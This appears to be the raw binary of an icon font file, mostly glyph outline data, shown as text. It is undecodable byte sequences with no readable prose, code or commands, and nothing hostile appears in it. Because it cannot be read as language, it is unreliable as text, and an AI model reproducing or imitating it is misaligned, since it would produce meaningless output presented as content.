@`5<Ly���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4646;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%& %

& % 
 

  

 
 @

``&%``@@`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�%%		%%


 


@@
`
 %`&� @@%%`�@

@�`"2_x��%#!"&5463!;!"3!;!2#!"&=46346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&#�%� %&@&���(88( �
��� &%��&% 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�


 


%%		%%[@
`
 %`&� @�`%% @

	`5<LZeq{�!2#!#!"&5463!!"&=463!5#"&=!"3!26=;'"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535`@(88(��%� %&`� ��(88(@�%��

�
�
v��&%�&%��` & % @
`
 � `  `��� ``�� ` 8(�(8@%&�&�`�`8(�(8@%�
� 

@��
���&�%&�%�`�%%��
  
�  �  @@ �` @ �` �`"2@KWak%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535`%� %&@&���(88(`�
����%&�`%&� % &  
`
 � `  `��� ``�� `�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
�  �  @@ �` @ �` 	@`5<LZes~�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 ` & % @
`
  & %& & 
 

 
  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
``�%%��
  
�%&`%%

`

@�`"2@KYd�%#!"&5463!;!"3!;"3!26=4&###546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653�%� %&@&���(88( �
���%& %&�`` & % @
`
 ` & % @
`
  & %& & 
 

 
 �@%&�&�%@8(�(8�
�&�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

@`5<LZhsz5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#'#5373537##546;2#'"354&+73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�00      �` & % @
`
 �0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��``�@@��``�%%��
  
����@�`"2@NY`%#!"&5463!;!"3!;"3!26=4&##'#5373537##546;2#'"354&+73#'3�%� %&@&���(88( �
���%& %&�p00      �` & % @
`
 �0 @ @ �@%&�&�%@8(�(8�
�&�%&�%��``�@@��``�%%��
  
����@`5<LVbnw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4675#3357#35#535#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[�����@ `  `�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&��  �  ��  �   @%%`�@

@�`"2<HT]%#!"&5463!;!"3!;!2#!"&=4675#3357#35#535#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%[�����@ `  `� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&��  �  ��  �   �`%% @

@`5<L\mu}5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+33535#!3535#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ %& %&

 

 � @� @� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
��  ��  @�`"2BS[c%#!"&5463!;!"3!;!2#!"&=46";26=4&#";26=4&+33535#!3535#�%� %&@&���(88( �
��� &%��&%[&% &% 

 

 � @� @��@%&�&�%@8(�(8�
�%�&%�&@%`&%`& 
`

`
��  ��  @`5<LTmw5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=463535##"&=46;5#";5#375#335����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ @�@@

``&%``@`����� `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`��  `@
`
 %`&� @�  �  @�`"2:S]%#!"&5463!;!"3!;!2#!"&=463535##"&=46;5#";5#375#335�%� %&@&���(88( �
��� &%��&%[ @�@@

``&%``@`������@%&�&�%@8(�(8�
�%�&%�&`��  `@
`
 %`&� @�  �  @`5<LWbo�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+5326=4&+'#353735##"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&` @

@�0       �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%� �
`
@`�@@��@
`
 %`&� @�`"2=HUn%#!"&5463!;!"3!;!2#!"&=46326=4&+326=4&+'#353735##"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&%`&%` @

@�0       �@

``&%``@�@%&�&�%@8(�(8�
�%�&%�&@�%`& �
`
@`�@@��@
`
 %`&� @`5<LX���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+;2+"&=46";26=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%[ `  `�&% 

 
 % &% 

 
 % � %& %&

 

  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&`�  �   %%


&%%


%&`%&`% 
`

`
@�`"2>m~�%#!"&5463!;!"3!;!2#!"&=46#35#535#7";2+"&51#1;2654&+"&546;234&+3";26=4&+";26=4&+�%� %&@&���(88( �
��� &%��&%[ `  `�&% 

 
 % &% 

 
 % �&% &% 

 

 �@%&�&�%@8(�(8�
�%�&%�&`�  �   %%


&%%


%%`&%`& 
`

`

@`5<LZcq|��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##532##'32654&###546;2#'"354&+##532##'32654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%U `%%@&Z@

�` & % @
`
 � `%%@&Z@

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%`�@

``�%%��
  
``�%%`�@

	@�`"2@IWbpy%#!"&5463!;!"3!;"3!26=4&###532##'32654&###546;2#'"354&+##532##'32654&#�%� %&@&���(88( �
���%& %&� `%%@&Z@

�` & % @
`
 � `%%@&Z@

�@%&�&�%@8(�(8�
�&�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

@`5<Leq{5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#"&=46;5#";5#37#35#535#535#3535����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�@

``&%``@` `  `��� ` `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@
`
 %`&� `�  �  @@ �` @�`"2KWa%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#37#35#535#535#3535�%� %&@&���(88( �
��� &%��&%�@

``&%``@` `  `��� `�@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� `�  �  @@ �` �	5	!!!�������r��s���s����� �	7!53!7%"&54632�``�``�%%%%��``�`���```%%%%`'#'3!53!3�����@�@�`� ��� ����@	���'!!3#3#3#3#3#3#!!333!�@���������������@����@@�������������@���@@@#5!3!265!!!!!!!!3#!!���%`(8���@����������@�����@%8( ����@@@@@@@@�����2'7>%''`B^@�@1��@ P�<�@8��^B1@�@� ��@P��@8����7'.'7#%5���@�@�;2c����������N@@�@�@��2;N��������������6$3#*10��Q�c��|H�0�@�d8�O�������	6	&7>%811.54632#"&'0>781>7���'P�f��
iiN98((88(	��9s��
���P��'�
��s9	(88((8��9Nii
���9234.234.7.54632#"&'%?�7j30W&%;`e��G�225`Fz�@��%%%	��@@�`;%&W03j7��e�`522�G]�zF�@@�`�	%%%���@����%&"'1;0232677'764'#5�&j&�y�k�(
�
�j�z�%%��m�m�*�%%�z�j�'�
�k�y�&j&�em�m�*���a�6.'32>7>&'#"&'32>7>'aK\j77j\KHYe55eYH~!|F)N!

,TJ="
"�E�wl//lw�E+XXV).L66L.)VXX+��>K-?'@�5*0�A���)-#54&#!"3!26=3!#";2654&+5!5!�&�@&&�&��� 

�

 @�@���@&&�&&@��
��

@
@�@�!-48181!8181!5!"3!2654&##"&54632!537������&&�&&�8((88((8@��@�@�@&�&&&�(88((88�����������,<HO#54&#!";3!2654&#8181!81!"81!8181!81#"&54632!537@@&��&&@&�&&�&@��&�����8((88((8@��@�@@&&�&@&&&@��@&��(88((88�������@+?C32>54.#"#.#!"#"3!2654&".54>32#530!8L++L8!!8L++L8!��$0�0$�&&�&&�&;gM--Mg;;gM--Mg���`+L8!!8L++L8!!8L50PP0&��&&@&��-Mg;;gM--Mg;;gM-�@���	L#32654&!";74.#".54>32.'>54&'>5 @@
�

@�P��jj��P4F),Aq�VV�qA,)F4��@
�

��
�@j��PP��j.X)9*L;'�
*V�qAAq�V*
�D';L*9)X.���*3#".54>32#".54>32�@#=R..R=##=R./S�#=R..R=##=R./S�� !:,,:!!:,pr�!:,,:!!:,p@@(,.#"32>7>54.'
�6qvy??yvq66qvy??yvq6��@�� )TY[//[YT))TY[//[YT)�����	@@"!#535#535#53!!#535#535#53%��������@����������@��@�������������������@@+/4632#"&%4632#"&54&#!"3!26=!5!�^BB^^BB^��^BB^^BB^&��&&�&����B^^BB^^BB^^BB^^�`&&��&&`��������'3?K[!"3!2654&"&54632"&54632"&54632"&54632"&54632.#!"463`�B^^BB^^��(88((88((88((88�(88((88�(88((88((88((88X:�B^I7&^B�B^^BB^�@8((88((8�8((88((8�8((88((8�8((88((8�8((88((8�7I^B�:X}&@����".#"32>72#"&5463�#Wcn:j��PP��j:ncW#��@))))
)B/P��jj��P/B)M�))))��2�!.'1897!5.'>&2IeF--FeI{j�f
Q.�.Q
f�jd6aWM!!MWa6\ɋ&GX|&&|XG&������O">7>54.#".'.#"3267>7!5.'32>54.#,N'8" 8K**K8 "8'N,+K8!!8K+,N
))3�3))
N,+K8!!8K+7"

(YN-+L8""8L+-NY(

"!8M++M9 #
 8_L8&&8L_8 
# 9M++M8!���@�	��@@����"F[e�4.'81#0130412>5"&'.'.5467>7>32467#*10232.'?>'"&'.'.5467>7>32#0SE~�ii�~ES0#�				��$B&3773&B$t�Rv	vK�c90AE"Q./Q"EB0:c�L�� .wBBw.!

!.wBBw. 6'K#_X_#K���
0B
....
��$EQ2.#"'>3%>32.#"1.#"'>7>324632#"&�O�4Z#]55]#Z4�O�;.hs|@@|sh.[$T\c33c\T$�(LGC[6~��MM��~6[CGL(*UWZ--ZWU��%%%%�<5Z#((#Z5<E-F//F-[$8&&8$�)17[6T::T6[71)		��%%%%���%Do4.#"!'>.54632'>54&#".54>32''>54.#".54>32P��jj��P1Y{I�I{Y1��%%3,:K55K:,KDW(F]55]F(WDK�I/P: 2WuBBuW2 :P/I<dH(Gy�]]�yG(Hd<�j��PP��jS�}_  _}�(%%;;	F.5KK5.F	�O5aJ,,Ja5O����;O`5BuW22WuB5`O;�SkE]�~JJ~�]EkSp-AU4632#"&>54&'.54>7#.54>7>54.�K55KK55K&>,,>&!''!��'!&>,,>&!'�$4!6W>"">W6!4$�6W>"">W6!4$$4�5KK55KKN;HT..TH;4�SS�4��S�4;HT..TH;4�S@zn`("]o~DD~o]"(`nzp"]o~DD~o]"(`nz@@zn`����
.2654&#"#".=##!5#5>=�B^^BB^^"#=R..R=#@(E]6�@�6]E(^B�B^^B��B^`.R=##=R.``8bM1�@@�1Mb8`@����&!"&5463!!"3!181"389!5!��`(88(`��5KK5� 

`��@��8((8K5�5K��@

@@H@#'8#";2654&#53%#";2654&#537?>'.�

�
-��`�

�
-���� ���@
�@

�
�@�
�@

�
�@OW��	W;��@�'-%5#35#3#35#3#35#3#35#3##!53!5@@�@�@�@�@�@�@�@@@@��@��@�@@���@@���@@���@@��@@@���@@����#!"3!2654&!!!!!!!!!!`�(88((88H�@�����@��@��@��@�8(��(88(@(8����@@@@@�@����'1!"3!2654&!!!!!!4632#"&#"!54&`�(88((88H�@�����@��@@8((88((8��(8@8�8(��(88(@(8���@@@@�(88((888&@@&@����!7.'.'.#!"3!2654&''#5#!"&54630:1;�-3')�!//!�!/�%
�)�	� 		���
��3-/!��!//!p)'6)�
%��		`	�
@����"8K.'.'.#!"3!2654&''#5#!"&54630:1;.#!"463!.�-3')��!//!`!/�%
�)o	��		s�s
��')��!/%	�[3-/!� !//!�)'6)�
%�		�	�
�/!� ,.	@����!7ESa.'.'.#!"3!2654&''#5#!"&54630:1;!"&5463!2'!"&5463!2'!"&5463!2�-3')�!//!�!/�%
�)�	� 		���
�@

�

�@

�

�@

�
�3-/!��!//!p)'6)�
%��		`	�
�



�



�



@����+3I%!575#"&546327.'.'.#!"3!2654&''#5#!"&54630:1;@����8((88((8V-3')�!//!�!/�%
�)�	� 		���
�@�@����(88((88�3-/!��!//!p)'6)�
%��		`	�
@����#9a.'.'.#!"3!2654&'1'#5#!"&54630:1;..#"326=%.#"32654&'�-3')�!//!�!/�%
�)o	� 		���
���!5KK55K!5KK55K�3-/!��!//!p)'6)�
%��		`	�
G@�8((88(�3�8((88(@
@����$:
.'.'.#!"3!2654&''#5#!"&54630:1;�@��-3')�!//!�!/�%
�)�	� 		���
�@��[3-/!��!//!p)'6)�
%��		`	�
@����%;?C.'.'.#!"3!2654&'9'#51#!"&54630:1;!!%7'�-3')�!//!�!/�%
�)o	� 		���
�@��@���3-/!��!//!p)'6)�
%��		`	�
��������
@����%;?CGKOSW[jn.'.'.#!"3!2654&'9'#51#!"&54630:1;3#;##3#;##3#;##3#;#;26=4&+5##5�-3')�!//!�!/�%
�)o	� 		���
��������������������������P����3-/!��!//!p)'6)�
%��		`	�
@@@@@@@@���@�@@���!!!%#35!#!35!��@�����e�@��e��@������e������ee���@���
47=#54&+"#!'#58138154&+3#!35#"3!!#!35!��&�&����@
@ ��� @

 ��@e��@@@&&@��@@��
@���@@
��
��[e�@���
	
%	7%	7��V�����g��g��g��g���������3�3�3�3�@!!����@��@@@
%!!!@������ ���@��@��@'!!##5#53533@��@��������������@�����@	'!!!5!@��@�����������@�@'!!'333@��@�ࠀ����������@'!!###@��@�ࠀ��������"���!"27>54&"&54632��0�$�(���(88((88��$(�d�0���8((88((8"���.!"27>54&"&54632#"2?��0�$�(���(88((88�x P0�$�(��$(�d�0���8((88((8� �$(�d@@#'+/37;?3#3#3#3#3#3#3#3#3#3#73#73#%3#%3#'3#%3#���@@�@@�@@@@�@@��  �  �  ��@@�@@�@@@@@@@@�������@��������������������������@@@@@@@@@@@@@@9���"&*.26:>BFJNRVZ^bfjnrvz~��������������������������!!1!3#%!!1!3#!!1!3#3#;##3#;##3#;##3#3#;##3#;##3#;##3#;#3#%3#73#'3#%3#;#73#;#73#;#73#;#73#3#%3#73#;#73#73#3#%3#73#73#;#73#3#%3#;#73#;##3#73#73#@�@�����@�@������@�@�����@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@�@@��@@@@@�@@@@@@@@@@�@@@@@@@@@@@@@@@@@@@@��@@@@@@@@�@@@@@@@@��@@@@@�@@@@@@@@@@@��@@@@@@@@@@@�@@�@@�@@��@�������@������@�@������@@@@@@@@@@@@@@@@@@@�@@@@@@�@@�@@�@@�@�@@@�@@@@�@�@@@�@@@@�@�@�@@�@@@@@@@����,1''#"&546?'&"7>322764'	@����J !%6 J@��J !%6 J@T���������J 6%! J��@J 6%! JT@���������0%#"&54632#"&54632!4&+33!5!"&585�8((88((8�8((88((8�%��0K5�% (88((88((88((88x�%@�d45K@%����';?C"32>54.".54>32535#5##3#3353+53#53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0��@����@��@@�@@�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<��@@@��@@@��������'r"32>54.".54>32&+"&'32654&+532654&+>;27>'.+"#";#";;2676&'�c��KK��cc��KK��cP�i<<i�PP�i<<i�o
-�2	�

��

�	2�-
J+�:X#

  

#X:�+J�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<$

@

$%+I7

@

7I+%����'V"32>54.".54>327#532654&+546327>'.#"#";!2654&#�c��KK��cc��KK��cP�i<<i�PP�i<<i�0�`

`8(,
J+B^ 

  

�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<�

 (8%+^B 

�

����'b"32>54.".54>322654&+76&'&'.#";#";326=32654&+53�c��KK��cc��KK��cP�i<<i�PP�i<<i�0

D_ee_D

``

`

`

``�K��cc��KK��cc��K��<i�PP�i<<i�PP�i<`

����

@

`

`

@@@#'+/!"3!2654&!2!546!"&5!%3#73#73#���(88(@(88��@
��M��
���@@�@@�@@@8(��(88(@(8@
``
��
 ��
����������#'+;G!"3!2654&!5!%!"3!2654&!5!5!5!!"3!2654&##5#53533���&&@&&��@��&&@&&��@��@���&&@&&�@��@��&��&&@&�@�&��&&@&��@�@�&��&&@&���@�����/?N\"32>54.4632#"&1'>54&'79.#"'>32.546773267#"&j��PP��jj��PP����pPPppPPp^�	

	��I11I'V..V�ޱ	

	��I11I'V..V�P��jj��PP��jj��P�PppPPpp[I11I'V..V'I�	

	���I11I'V..V'���	

	�����)#"&'.54676.#"130>54.�0 00`00PP0$HTB<*-I[//���0<H<>TV@0PP00`00 0VT><H<0���//[I-*<BTH$���:.546'.#"&'&67>781>31:3:31281�biS!f==f!Sib%If�[[�fI%�*a	&$$8$#

#$8$$&	a*>&.##.&>@����#'+!2#"&5463!54631323#3#3#3#���5KK55KK5���K5�5K�@````````���K55KK55K�@5KK5��@�@�@�@!"3!2654&!7!	%���(88(@(88�������ggg�����@8(��(88(�(8�Z����&�6nn��"�����#35%7'7 ``���'i�``��@�@�``����'���``@@�@���@�"10>54."&54632BuW2dxddxd2WuBPppPPpp�2WuBx�̂��xBuW2�pPPppPPp���@�'3"10>54.".54>32'4632#"&BuW2dxddxd2WuB)G55G))G55G�I33II33I�2WuBx�̂��xBuW2��5G))G55G))G5�3II33II����!*'.5!"&'&676#!2	 � 

�
�@	��p
^�@��
�@
@
������!$2"32>54.4>32.5
"&'%#j��PP��jj��PP����Aq�VR�8�d�4<�nIR�8��4<Aq�V�P��jj��PP��jj��P�V�qA<4��d8�RIn�<4��8�RV�qA���%%%@���@���������� �@����%%%
%%%%�����`@`��������������Rf��f]��]R]x] @�%+2#5267>54&'.#"33>!3�]�zFFz�]G�225522�GG�2&2	���Nv����Fz�]]�zF`522�GG�22552&_4�Q�g;���@����-%'3"32>54.".54>32�Ӏ��j��PP��jj��PP��jP�i<<i�PP�i<<i�����P��jj��PP��jj��P��<i�PP�i<<i�PP�i<���"32>54.'3j��PP��jj��PP��)Ӏ�Z�P��jj��PP��jj��P���Z@����'7EK"32>54.".54>32>54&#"1%.#">#!5]�zFFz�]]�zFFz�]K�a99a�KK�a99a�\
pP.P2[QE��P.Pp
EQ[�@@Fz�]]�zFFz�]]�zF��9a�KK�a99a�KK�a9�0Pp)"
'6E(�")pP0(E6'���@���:]%4.54&'.'4654&#"3267>5041.#".'.'>7>32O`P!2@$&&)F3P`P<k�V<%%<V�k<�(_4I22I4_(8:

:8 JPU++UPJ 8:

:8�lhHPT
*K=+
$$4GZ1TPHhl3)&&)361DD1			
		
			@���� A5354&+"332>54.#"&'.5467>7326'�%�%�Q�g<Aq�VV�qA<g�q-u@@u-.00.+p==p+.00.�A@%%@AFo�RV�qAAq�VR�oF��.00.-u@@u-,0��:0,-u@@u-����#'373#73#73#3#73#73#3#73#73#%3##5!#5#!!!@����������������������������������@���@��@@�����������@��������@@@@��@��#'!!!";!32654&"&54632!!����&&��&&��%%%%%�����@&��&�&@&�%%%%�@@@�@#'+/37;?C!"3!2654&3##5%3##5%3##5'3#3##53!5!#535#535#53@�&&&&�&���������������@@��@@@@�������@&��&&�&��@����@����@����@�������@�@��
!!!!!'@����� @@���������@@@@
4&#!"#!5!5!7!81!81�&��&��������&&����@@���@�#!"3!2654&!!"&546327!!�@(88(�(88�x��%%%%��8(��(88(@(80 ��%%%%�����@� !"3!2654&"&54632#%!!��&&@&&�� ��@�&��&&�&�.��@����!"3!2654&"&54632%!! ��(88(�(88��


��@�8(��(88(@(8� 



`���/O.'7'&"#132>7>54.#".'.5467>32�B�J�@� �@�-YVS(6qvy??yvq6�)TY[//[YT))TY[//[YT)�	�@�@�	)TY[//[YT))TY[//[YT��6v??v66v??v���!/=	.#!"3!2654&##'#5!'!"&5463!2!"&5463!2��
�@
�%�%<�������@

�
3��

@
4@����%% 0��+�ի



�



���!	.#!"3!2654&##'#5!��
�@
�%�%<������4@����%% 0��+���!3!265	35!37!@���
�
������[@J@���`

������@@�!3!265!5#	7!@���
�
����@@�[@J@���`

�������@@���	###
-'%����H�[�[H�����Ha��aHi������33	3
-5%�������%�[�[%����pcm��mc�������!!!3#!3!3��������@@K5�������@5@@7!265!%3#!!��Pp�p�@@���@@pPPp�@�����+A"32>=4.".532>=".532>=j��PP��jj��PP��jj��PP��jj��PP��jj��PP��jj��PP���,:!�!:,,:!�!:,��,:!�!:,,:!�!:,��,:!�!:,,:!�!:,�!"'!'>32>54.#5d\R#���5�PP�i<"0U(@-P��j�'7#����4<<i�P+QIA`#Vbl9j��P� 7.54>32!.#"-@(U0"<i�PP�5���#R\d5j��P�9lbV#`AIQ+P�i<<4���#7'P��@����
>.	6�+&8�������FO@M��e�����������5	5&&>@�����8&+iOF��������e��Mr�����75	5.7+&8�������FOi�M��e��������r@����%	>&''������8&+iOF�ɸ����e��Mr������"2#"&'5>54&'.54>j��PP��j()Z]`03M,F1P���Aq�VV�qA)3
W4HR\1V�qA����!N%#"&'#".54>322.#"*#"&'5>54&'.54>@$4Y )<iN--Ni<<iN-��h��R%Q*H�359()Z]`03M,F1P��;"8(#(F]55]F((F]5*Kx?n�U1-/{D"@)3
W4HR\1V�qA����$H12#"&'5>54&'.54>3.'#"&'2>7>7>54&5�c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.���3W">7>3:3267>7>54&'.'.#512#"&'5>54&'.54>)O&#>253/ )O&#>2552>#&O)j��PP��j()Z]`03M,F1P��

")d6;3.		


")d66d)"

�Aq�VV�qA)3
W4HR\1V�qA����!n%#"&'#".54>32>7>3:3"&'5>54&'.54>32.'.'.'.#"@$4Y )<iN--Ni<<iN-��253/ ()Z]`03M,F1P��jh��RC"	2(>#&O))O&#>;"8(#(F]55]F((F]5*K�)d6;3.		
�)3
W4HR\1V�qA?n�U*N "



"����3X|">7>3233267>7>54&'.'.#512#"&'5>54&'.54>3.'#"&'2>7>7>54&5�&I"!9-0./&I"!9-00-9!"I&c��KK��c&&SWX-0D)B.K��c2*M�C H�57hbY''>6?TF@%Z05..	%Z10Z%�=i�PQ�j='/
Q1
CMV.P�i=��*E&B% !0 K),^1-wDN�.@�@%5>54.#"!4.@5K$NHHN$K5Q�g;�;g��5�J<iN--Ni<J�5-CW00WC-����A%5>54.#"!4.>7.'.5467>7.#"!>75K$NHHN$K5Q�g;�;g���*e9	P9
OZHN$K5Q�g;
�5�J<iN--Ni<J�5-CW00WC-)
*Y-Aw20<:E-Ni<J�5-CW0
	���2>%4>7>54.#"!."32>54.##5#53533�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid�@��@��9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-����@�����26%4>7>54.#"!."32>54.!5!�"=U2$NHHN$K5Q�g;�`<iN--Ni<<iN--Nid��@�9gVB<<iN--Ni<J�5-CW009-Ni<<iN--Ni<<iN-��@���#	'!5.'5>54.#"!���`@�`��@2�K5K$NHHN$K5Q�g;�`��`@�``s&5�J<iN--Ni<J�5-CW0���4632#"&#'#"!4&@pPPppPPp�#�J``J�#`  PppPPpp��lt``���pP��@Pp@=2#".5'4>3">!2#".5'4>3">�.R=##=R..R=#Fz�]@u-	I.R=##=R..R=#Fz�]@u-	#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@=".54>32#5267>7!".54>32#5267>7 .R=##=R..R=#Fz�]@u-	��.R=##=R..R=#Fz�]@u-	@#=R..R=##=R. ]�zF�0.
#=R..R=##=R. ]�zF�0.
@����";W>54&'!!>54.'4>75.51!.=467>7!!.�4U=!��!=U44U=!z!=U4��9S66S9�9S66S9�661�f1666M�M�!^s�H  H�s^!!^s�H  H�s^!�@FhMdMhFFhMdMhF"G@G3 2G@GxKLw8��#/BUht4632#"&4632#"&4632#"&4632#"&81463281#"&5%81463281#"&581463281#"&54632#"&�K55KK55KK55KK55K�%%%%p%&&%��%%%%��&%%& 9'(88('9X****@5KK55KK;5KK55KK�%%%%�%%&&V%%%%p%%&& '99'(88(��**** ���:r.'.'.'.7>7>7>7>7:3265<51'.'.'.'.7>7>7>7>19$#T.-a11_,-O!!46!"N++Z..Y))K1	%f3I((U**S'&E,.C%%O''M$#@)

!�2c-.R"#57#"Q-,^//\++M  24! L)4%�(G.1G&'Q))P%%B+
-A$#K&$3����
-?Pbp�����"&=4632"&=4632"&/&676#"&/&676#"&/.7>"&/.7>#%#"&546;2%81#"&54638132#"&'&6?6#"&'&6?6#"&'.?>#"&'.?>#####�Y-Yf	Z
Z	�7�*�
_��
�o����

���

�$			�m�

��7
		Y	 		Yf
Z
Z�#�##�#�J����-�-��	���Z
*Y*��Z
Z��$	Y

$	ZuZ
Z��!�	 �
x�

����*4C467'7.%>54&'7.'>75#"&'3267'��*;&r'-�-'r&;*��Ep!�RgyB��!pEBygRTC##Cr7}CC}7r�		<07h_T#�+o>>o+�#T_h70<	1S;<:cL1œ;S�1Lc:��!!����'Z"32>54.2#".54>#".'.54>7813267>4&'7j��PP��jj��PP��j5]F((F]55]F((F]fGMT++TMG/  /C11110{CC{01111C/  /�P��jj��PP��jj��P�(F]55]F((F]55]F(��/  /GMT++TMGC2{�{2/33/2{�{2CGMT++TMG9����)6BObn4632#"&81463281#"&4632#"&4632#"&5%4632#"&4632#"&581463281#"&5!#"&54632�K55KK55K�>++>>++>g8('88'(8��2$$22$$2��. !--! .i****w&%%&�C00DD00C@5KK55KK��+>>++>>�(88('88I$22$$22$p!--! ..0****&&%%0DD00CC��F#/;GS%4632#"&4632#"&%4632#"&4632#"&4632#"&%4632#"&4632#"&�8((88((8�`8((88((8@8((88((8�:8((88((8L8((88((8��8((88((8L8((88((8 (88((88�(88((88((88((88N(88((88��(88((88((88((88t(88((88���8".'.5467>732>54&'.'7#3c\T$$8&('%h?+3U!Aq�VV�qA!U3+?h%'(&8$$T\c3@&8$$T\c3I�=;_VM11q;V�qAAq�V;q11MV_;=�I3c\T$$8&���3">3232654.2>7#".54&#"i��RCq�UV�qA8((8P��ji��RCq�UV�qA8((8P���N��h[�vDFz�](88(j��P�N��h[�vDFz�](88(j��P���D�1812233332323023323:323232013023181263623263263>7>7>7>7627267>7261263>7>7>7>7>3>7>7>7>7>7>7>7>7>7>7>7465>7>7467465>7465465645045>5465<5645645<12650451814&5&454&54&5.'.'.'.'&4'4&'.'4&54&5.'.'.'.'.5.'.'.'.'.'.'.'.'.'.'"&'"&#.'.'.#.#.#.'"&#"&#0"#.#"&#*#&"#&"#*#4&#0"#181"#"#"#"#"""#"##0107041465>7467465>7461465>7>7>7465>5>7>7>7>7>7>7>7>7>7>7>7263>7>7263627263>3623623021627:3:7:3263:3:3:323:323021209>720222321233322110109011"#"#""##"#"1*#"*#**#"#*#*#*#&"#*#&"#0"10"9"&'.'"&'"&#.'"&1"&#.#.'.'.#.'.'.'"&'.'.'.'.'.'.'.'.'4&5.'.'4&5&4'4&5.5&45"41<1&4'<5<'<54&5<5<5<5645<5645041049.'	
%	


	%	
&


		$J


#





"


�	



	%	
&	



	%	
%A





"





#���-!7.#"3267>7#".54>327���7�MM�76::67�MM�7	`#Vbl:j��PP��j5d\R#�@�6::67�MM�76::6	T(A-P��jj��P'7#����)7ES!!%!!#!!!#"3!26533!2654&#"&546;2#"&546;2#"&546;2@������x8���8**0*�*0**�����@

@
o���@@@���*��**x��**0*��



�



�@



����"6%'.>54.#"326776&".54>32��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����"6B%'.>54.#"326776&".54>32##33535#��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]������Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(����������"6:%'.>54.#"326776&".54>32!!��'+1<i�PP�i<<i�PG�2�K��5]F((F]55]F((F]����Y�2�GP�i<<i�PP�i<1+'�K(F]55]F((F]55]F(@����
!7')'7''77'7�`��`����`�������`����`�����`�������`����`��`�`��`�����
!'7''77'7)7'@���`����`����`��`����`����`����`��`����`�� ���`�����
''7'!7��`������`����`��`���`��������
''7'!7���`����`����`��`���������!-";535353732>54."&54632�BuW2�{%@���S6BuW22Wu(88((88�2WuB�{�%@��S	
2WuBBuW2��8((88((8����$)9'./.35353535676&'"'&4?62�e5e9��F�� ����	�6���.8-���-
	��		-
		�e5e�6����@��GF9��.7-���-			
-		��	����##54&+"#"3!2654&%46;2!PqO�Oq �\&�&��OqqO�� ��&&�����#2#54&+"32#!"&5463!5463Oq�&�&���qO�qO��&&�� ��Oq����'%>54.#""/3267?6&�3-Ni<*�f6�-Ni<%D�3e��D%<iN-�6f�*<iN-�3e3�37OS54&+"#3;26=!5534&+"!!;26=35#534&+"#3;26=!5!53�����@������@�����������@����@�����������������@����37OS326=4&+5##";33#26=4&+##";35'3#26=4&+5##";3'3#��������������������������@�@�������@������@������6J.>7'#".5#&'>323467>7.'".54>32�	/#e2(G5�

>HM#e%
	.#e2(G5�

>IL$d%
�Z+K9  9K++K9  9K^#LI>�
5G)2#.	�
